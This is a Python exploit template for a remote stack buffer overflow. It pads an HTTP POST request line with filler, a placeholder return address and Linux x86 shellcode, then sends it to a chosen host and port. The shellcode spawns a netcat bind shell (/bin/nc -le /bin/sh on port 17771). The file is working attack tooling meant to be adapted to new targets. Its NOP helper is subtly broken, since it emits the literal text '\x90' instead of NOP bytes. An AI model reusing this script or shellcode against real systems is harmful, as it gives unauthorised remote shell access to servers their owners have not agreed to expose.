#!/usr/bin/env python
# $Id: template_class_exploit.py,v 1.0 2018/07/08 00:12:19 dhn Exp $

import struct
import socket
import argparse

class Exploit:
	"""Open a single TCP connection to ``server:port`` and write ``payload`` to it.

	The constructor only records its arguments; no network activity happens
	until :meth:`run` is called.
	"""

	def __init__(self, server, port, payload):
		# Keep the three inputs under private names; ``run`` reads them later.
		self._server = server
		self._port = port
		self._payload = payload

	def __connect(self):
		"""Return a fresh TCP socket already connected to the configured endpoint."""
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.connect((self._server, self._port))
		return sock

	def run(self):
		"""Connect, write ``payload`` plus CRLF, then close the socket.

		A ``socket.error`` from connect or send is caught and reported on
		stdout; any other exception propagates.  When the error is raised
		after the socket was created it is not closed here.
		"""
		try:
			sock = self.__connect()
			print("[+] Sending payload to " + str(self._server))
			# send() may write fewer bytes than requested; the count is not checked.
			sock.send(self._payload + "\r\n")
			sock.close()
		except socket.error:
			print("[!] socket error")

def p(x):
	"""Pack ``x`` as a 4-byte little-endian unsigned integer (``struct`` format ``<L``).

	Raises ``struct.error`` when ``x`` is negative or does not fit in 32 bits.
	"""
	return struct.Struct("<L").pack(x)

def nops(size=1024):
	"""Return a filler string of ``size`` copies of the literal text ``\\x90``.

	The source literal is escaped, so each repetition contributes the four
	characters backslash, ``x``, ``9``, ``0``; ``size=0`` yields ``""``.
	"""
	return "".join(["\\x90"] * size)

def main(opt):
	"""Assemble the request string and hand it to :class:`Exploit`.

	``opt`` is the argparse namespace produced below; ``opt.host`` is passed
	through unchanged and ``opt.port`` is converted with ``int``, so a
	non-numeric port raises ``ValueError`` before any connection is made.
	"""
	# TODO: Change me!
	shellcode = (
		"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68"
		"\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73"
		"\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f"
		"\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62"
		"\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0"
		"\x0b\xcd\x80"
	)

	# PAYLOAD: fixed-length filler, the packed placeholder address from p(),
	# a short nops() run, then the template shellcode above.
	segments = [
		"A" * 666,
		p(0xdeadbeef),
		nops(10),
		shellcode,
	]
	payload = "".join(segments)

	# REQUEST: the payload sits in the request-target of a POST line.
	request = "".join([
		"POST / ", payload, " HTTP/1.1\r\n",
		"Host: 127.0.0.1\r\n\r\n",
	])

	# RUN
	Exploit(opt.host, int(opt.port), request).run()

if __name__ == "__main__":
	# Command-line entry point: both flags are mandatory; the port string is
	# converted to int inside main().
	cli = argparse.ArgumentParser()
	cli.add_argument("--host", help="Target hostname or ip", required=True)
	cli.add_argument("--port", help="Target port", required=True)
	main(cli.parse_args())
